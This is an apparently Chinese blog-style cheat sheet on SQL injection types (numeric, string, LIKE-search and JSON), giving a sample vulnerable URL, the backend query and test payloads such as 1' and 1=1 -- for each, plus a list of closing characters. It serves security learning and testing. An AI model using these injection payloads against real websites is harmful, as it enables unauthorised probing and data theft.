不是少年守不住初心,而是岁月慌了人心。。。

----  网易云热评

一、数字型注入

1、存在注入的url

www.baidu.con/aiyou.php?id=1

2、数据库查询的语句

select * from aiyou where id=1

3、测试语句

1 and 1=2

二、字符型注入

1、存在注入的url

www.baidu.con/aiyou.php?id=1

2、数据库查询的语句

select * from aiyou where id='1'

3、测试语句

1' and '1'='1
1' and 1=1 --

三、搜索型注入

1、存在注入的url

www.baidu.con/aiyou.php?id=1

2、数据库查询的语句

select * from aiyou where id like '%1%'

3、测试语句

1%' and 1=1 and '%'='

四、json型注入

1、存在注入的url

www.baidu.con/aiyou.php?id=1

2、数据库查询的语句

{
    "id":"1"
}

3、测试语句

{
    "id":"1 and 1=1"
}

五、常见闭合符号

' "  ) ') ") ')) }

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

常见的sql注入类型闭合及符号_数据库查询


常见的sql注入类型闭合及符号_数据库查询_02